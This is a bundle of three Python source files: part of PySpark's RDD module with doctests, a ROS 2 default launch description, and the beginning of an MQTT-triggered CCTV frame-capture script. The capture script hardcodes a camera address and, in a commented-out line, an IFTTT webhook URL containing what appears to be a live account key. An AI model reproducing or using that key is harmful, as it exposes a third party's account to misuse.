>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<http://dx.doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
port = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _load_from_socket(port, self._jrdd_deserializer)
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
default_launch_description.py
|
# Copyright 2018 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing the default LaunchDescription for ROS."""
import threading
from typing import Dict # noqa: F401
from typing import Text # noqa: F401
from typing import TextIO # noqa: F401
import launch
import launch.actions
import launch.events
import rclpy
from rclpy.executors import SingleThreadedExecutor
class ROSSpecificLaunchStartup(launch.actions.OpaqueFunction):
"""Does ROS specific launch startup."""
def __init__(self, rclpy_context=None):
"""Constructor."""
super().__init__(function=self._function)
self.__shutting_down = False
self.__rclpy_context = rclpy_context
def _shutdown(self, event: launch.Event, context: launch.LaunchContext):
self.__shutting_down = True
self.__rclpy_spin_thread.join()
self.__launch_ros_node.destroy_node()
def _run(self):
executor = SingleThreadedExecutor(context=self.__rclpy_context)
try:
executor.add_node(self.__launch_ros_node)
while not self.__shutting_down:
# TODO(wjwwood): switch this to `spin()` when it considers
# asynchronously added subscriptions.
# see: https://github.com/ros2/rclpy/issues/188
executor.spin_once(timeout_sec=1.0)
except KeyboardInterrupt:
pass
finally:
executor.remove_node(self.__launch_ros_node)
def _function(self, context: launch.LaunchContext):
try:
if self.__rclpy_context is None:
# Initialize the default global context
rclpy.init(args=context.argv)
except RuntimeError as exc:
if 'rcl_init called while already initialized' in str(exc):
pass
raise
self.__launch_ros_node = rclpy.create_node('launch_ros', context=self.__rclpy_context)
context.extend_globals({
'ros_startup_action': self,
'launch_ros_node': self.__launch_ros_node
})
context.register_event_handler(launch.event_handlers.OnShutdown(
on_shutdown=self._shutdown,
))
self.__rclpy_spin_thread = threading.Thread(target=self._run)
self.__rclpy_spin_thread.start()
def get_default_launch_description(*, rclpy_context=None):
"""
Return a LaunchDescription to be included before user descriptions.
:param: rclpy_context Provide a context other than the default rclpy context
to pass down to rclpy.init.
The context is expected to have already been initialized by the caller
using rclpy.init().
"""
default_ros_launch_description = launch.LaunchDescription([
# ROS initialization (create node and other stuff).
ROSSpecificLaunchStartup(rclpy_context=rclpy_context)
])
return default_ros_launch_description
|
event-capture.py
|
import paho.mqtt.client as mqtt
import urllib.request as request
import logging
import logging.config
import json
import os
import shutil
import datetime
import urllib
from queue import Queue
from threading import Thread
from subprocess import call
IMAGE_URL = "http://192.168.37.21/oneshotimage.jpg"
# The MQTT host will be another container that is part of the docker compose setup
MQTT_HOST = "mosquitto"
MQTT_PORT = 1883
EVENT_DIR = "/cctv/events"
GRAB_FOR_SECS = 30
FPS = 1
VIDEO_CONVERT = ["avconv", "-r", "1", "-i", "%4d.jpg", "event.mp4"]
MAKER_URL = None
#MAKER_URL = "https://maker.ifttt.com/trigger/gate/with/key/bjS1EJTq2pcD3cCXnhZgi_"
# Load logging config from logging.json
def setup_logging(default_path='logging.json',
default_level=logging.INFO,
env_key='LOG_CFG'):
path = default_path
value = os.getenv(env_key, None)
if value:
path = value
if os.path.exists(path):
with open(path, 'rt') as f:
config = json.load(f)
logging.config.dictConfig(config)
logging.info("Configured logging from json")
else:
logging.basicConfig(level=default_level)
logging.info("Configured logging basic")
def on_connect(client, userdata, rc):
logging.info("Connected to mqtt")
# Subscribe to any mqtt channels here
client.subscribe("GateGuard/Event")
def on_message(client, userdata, msg):
cctvlogger = logging.getLogger('cctv')
cctvlogger.debug('MQTT message received: ' + str(msg.payload))
# Parse the message as json
json_msg = json.loads(msg.payload.decode("utf-8"))
userdata.put(json_msg)
def mqtt_listner(out_q):
cctvlogger = logging.getLogger('cctv')
cctvlogger.info("MQTT listener started")
client = mqtt.Client(userdata=out_q)
client.on_connect = on_connect
client.on_message = on_message
cctvlogger.info("Connecting to mqtt server using: "
+ MQTT_HOST + ":" + str(MQTT_PORT))
client.connect(MQTT_HOST, MQTT_PORT, 60)
client.loop_forever()
cctvlogger.error("mqtt_listener stopped")
def frame_grabber(in_q, out_q, frameURL):
cctvlogger = logging.getLogger('cctv')
cctvlogger.info("Frame Grabber started: " + frameURL)
event_dir = None
event_seq = 0
grabbing = False
next_grab = datetime.datetime.now()
end_grab = next_grab
frame_interval = datetime.timedelta(seconds=1/FPS)
while True:
if not grabbing:
# Block waiting for an incoming message
cctvlogger.info("Blocking waiting for a message")
msg = in_q.get()
# We got a message so start a new event
now = datetime.datetime.now()
cctvlogger.info("Frame Grabber, got Message: " + str(msg))
end_grab = now + datetime.timedelta(seconds=GRAB_FOR_SECS)
cctvlogger.info("End of event: " + str(end_grab))
grabbing = True
next_grab = now
